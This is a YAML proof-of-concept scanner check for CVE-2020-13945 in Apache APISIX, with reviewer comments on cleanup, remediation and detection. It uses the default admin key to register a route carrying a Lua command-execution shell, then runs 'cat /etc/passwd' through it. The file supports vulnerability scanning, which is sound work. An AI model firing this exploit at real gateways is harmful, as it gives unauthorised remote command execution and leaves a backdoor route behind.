yaml-poc-apache-apisix-other-CVE-2020-13945.yml
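# Scanner check for CVE-2020-13945 in Apache APISIX: the Admin API is
# reachable and still accepts the admin key shipped in the default
# configuration. See the write-up under detail.links for background and
# affected versions.
#
# The page extraction had flattened every key to column 0, which makes
# `request` and `expression` duplicate top-level keys. Nesting is restored
# here; every key and value is unchanged.
#
# NOTE(review): nothing in this file removes the route created by r0. After a
# positive result the route is still present on the tested gateway and must be
# deleted through the Admin API by the operator. Rule r0 returning 201 already
# shows that the default key is accepted; r1 only confirms that the registered
# script runs.
#
# Remediation on the APISIX side: replace the default admin key and restrict
# Admin API access to management addresses (the `allow_admin` setting).
# Detection: alert on writes to /apisix/admin/routes from non-management
# sources and audit existing routes for an unexpected `script` field.
name: poc-yaml-apache-apisix-cve-2020-13945-rce
binding: 08d4a8b7-1afe-45c5-8ac3-9311ddb30d18
manual: true
detail:
  author: Monday
  links:
    - https://github.com/vulhub/vulhub/blob/e00b6928c5db067c76e30bc96818a96ae47618b5/apisix/CVE-2020-13945/README.zh-cn.md
  vulnerability:
    id: CT-146369
    # NOTE(review): the check name says "rce" but the level is "medium";
    # confirm the severity against the team's rating scheme.
    level: medium
transport: http
# Random per-run names (route path and query parameter) so the test route
# does not collide with routes already configured on the gateway.
set:
  s1: randomLowercase(20)
  s2: randomLowercase(10)
rules:
  # r0: try to register a route through the Admin API using the default key.
  r0:
    request:
      cache: true
      method: POST
      path: /apisix/admin/routes
      headers:
        Content-Type: application/json
        # Admin key from the default APISIX configuration; a deployment that
        # has rotated the key rejects this request and the check stops here.
        X-API-KEY: edd1c9f034335f136f87ad84b625c8f1
      # JSON route definition whose `script` field carries Lua that the
      # gateway runs when the route is requested.
      body: "{\r\n\"uri\": \"/{{s1}}\",\r\n\"script\": \"local _M = {} \\n function _M.access(conf, ctx) \\n local os = require('os')\\n local args = assert(ngx.req.get_uri_args()) \\n local f = assert(io.popen(args.{{s2}}, 'r'))\\n local s = assert(f:read('*a'))\\n ngx.say(s)\\n f:close() \\n end \\nreturn _M\",\r\n\"upstream\": {\r\n\"type\": \"roundrobin\",\r\n\"nodes\": {\r\n\"example.com:80\": 1\r\n}\r\n}\r\n} "
    # 201 Created: the Admin API accepted the route with the default key.
    expression: response.status == 201
  # r1: request the route created by r0 and look for a passwd-file root entry
  # in the raw response.
  r1:
    request:
      cache: true
      method: GET
      path: /{{s1}}?{{s2}}=cat+/etc/passwd
    expression: '"root:[x*]:0:0:".bmatches(response.raw)'
# The finding is reported only when both rules match, in order.
expression: r0() && r1()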